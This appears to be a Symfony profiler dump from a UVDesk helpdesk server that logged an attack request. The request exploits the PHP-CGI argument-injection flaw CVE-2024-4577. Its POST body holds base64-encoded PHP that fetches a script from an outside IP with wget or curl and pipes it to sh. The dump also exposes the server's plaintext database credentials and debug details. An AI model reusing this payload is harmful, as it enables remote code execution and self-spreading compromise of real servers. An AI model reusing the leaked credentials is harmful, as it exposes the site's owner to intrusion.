n/a
Request
GET Parameters
| Key | Value |
|---|---|
| �d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
| Key | Value |
|---|---|
| <?php_shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMjE3LjYwLjE5NS4xMTMvc2ggfHwgY3VybCAtc2sgaHR0cHM6Ly8yMTcuNjAuMTk1LjExMy9zaCkgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA | "")); echo(md5("Hello CVE-2024-4577")); ?>" |
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _firewall_context | "security.firewall.map.context.customer" |
| _remove_csp_headers | true |
| _stopwatch_token | "fa1bb1" |
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| connection | "keep-alive" |
| content-length | "245" |
| content-type | "application/x-www-form-urlencoded" |
| host | "155.138.197.110:443" |
| upgrade-insecure-requests | "1" |
| user-agent | "libredtail-http" |
| x-php-ob-level | "1" |
Request Content
Raw
<?php shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMjE3LjYwLjE5NS4xMTMvc2ggfHwgY3VybCAtc2sgaHR0cHM6Ly8yMTcuNjAuMTk1LjExMy9zaCkgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA=")); echo(md5("Hello CVE-2024-4577")); ?>
Response
Response Headers
| Header | Value |
|---|---|
| access-control-allow-headers | [ "Access-Control-Allow-Origin" "Authorization" "Content-Type" ] |
| access-control-allow-methods | "GET,POST,PUT,OPTIONS" |
| access-control-allow-origin | "*" |
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Sat, 13 Jun 2026 23:18:43 GMT" |
| vary | "Accept" |
| x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2F155.138.197.110%2Fhello.world%22" |
| x-debug-exception-file | "%2Fvar%2Fwww%2Fuvdesk%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135" |
| x-debug-token | "07b217" |
| x-debug-token-link | "https://155.138.197.110/_profiler/bfc865" |
| x-previous-debug-token | "bfc865" |
| x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_ENV | "dev" |
| APP_SECRET | "YOUR_APP_SECRET" |
| DATABASE_URL | "mysql://uvdeskuser:SecurePass123!@127.0.0.1:3306/uvdesk?serverVersion=8.0" |
| GOOGLE_RECAPTCHA_SECRET | "" |
| GOOGLE_RECAPTCHA_SITE_KEY | "" |
| MAILER_DSN | "null://null" |
| MAILER_URL | "null://localhost" |
| UV_SESSION_COOKIE_LIFETIME | "1440" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "245" |
| CONTENT_TYPE | "application/x-www-form-urlencoded" |
| DOCUMENT_ROOT | "/var/www/uvdesk/public" |
| DOCUMENT_URI | "/index.php" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HOME | "/var/www" |
| HTTPS | "on" |
| HTTP_ACCEPT | "*/*" |
| HTTP_CONNECTION | "keep-alive" |
| HTTP_CONTENT_LENGTH | "245" |
| HTTP_CONTENT_TYPE | "application/x-www-form-urlencoded" |
| HTTP_HOST | "155.138.197.110:443" |
| HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
| HTTP_USER_AGENT | "libredtail-http" |
| PATH_INFO | "" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
| REDIRECT_STATUS | "200" |
| REMOTE_ADDR | "138.124.242.51" |
| REMOTE_PORT | "46218" |
| REMOTE_USER | "" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1781392723 |
| REQUEST_TIME_FLOAT | 1781392723.6941 |
| REQUEST_URI | "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
| SCRIPT_FILENAME | "/var/www/uvdesk/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "155.138.197.110" |
| SERVER_NAME | "support.spotbox.ai" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SOFTWARE | "nginx/1.18.0" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,UV_SESSION_COOKIE_LIFETIME,MAILER_DSN,GOOGLE_RECAPTCHA_SITE_KEY,GOOGLE_RECAPTCHA_SECRET,MAILER_URL" |
| USER | "www-data" |